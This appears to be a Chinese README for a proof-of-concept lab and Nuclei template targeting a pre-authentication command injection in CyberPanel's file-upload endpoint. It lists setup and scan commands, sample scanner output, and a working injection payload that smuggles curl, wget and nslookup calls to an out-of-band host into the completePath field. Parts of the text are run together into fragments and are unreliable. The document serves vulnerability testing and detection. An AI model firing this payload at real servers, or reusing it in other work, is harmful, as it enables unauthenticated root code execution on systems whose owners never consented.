Proof-of-concept 环境及 Nuclei 模板,用于测试 CVE-2024-51568——CyberPanel 中的预认证命令注入漏洞,可实现具有 root 权限的远程代码执行。
一个用于测试 CVE-2024-51568(CyberPanel 中一个严重的未授权命令注入漏洞)的概念验证环境和 Nuclei 模板。
/filemanager/uploadcompletePathcd docker/
docker-compose up -d --build
curl -I http://localhost:8090
nuclei -t template/cve-2024-51568.yaml -u http://localhost:8090
示例输出:
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.online
[CVE-2024-51568] [http] [critical] http://localhost:8090/filemanager/upload
[INF] Scan completed in 5.706766772s. 1 matches found.
CyberPanel v2.3.4 的文件上传功能中存在命令注入缺陷:
POST /filemanager/uploadcompletePathProcessUtilities.outputExecutioner() 执行completePath 中通过注入命令发送恶意文件上传/dev/null; curl {{interactsh-url}} || wget {{interactsh-url}} || nslookup {{interactsh-url}}; #
该载荷确保在不同系统配置下都能可靠检测。
此环境包含故意引入的漏洞,仅用于安全研究和教育:
本概念验证仅用于教育和授权的安全测试目的。用户有责任遵守适用法律并在测试前获得适当授权。